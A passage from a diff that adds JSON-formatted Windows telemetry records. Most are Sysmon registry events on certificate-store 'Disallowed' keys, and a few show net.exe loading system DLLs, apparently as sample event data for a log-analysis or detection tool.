"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\My", + "registry_value": "My", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vmhgfs.dll", + "image_path": "C:\\Windows\\System32\\vmhgfs.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "drprov.dll", + "image_path": "C:\\Windows\\System32\\drprov.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 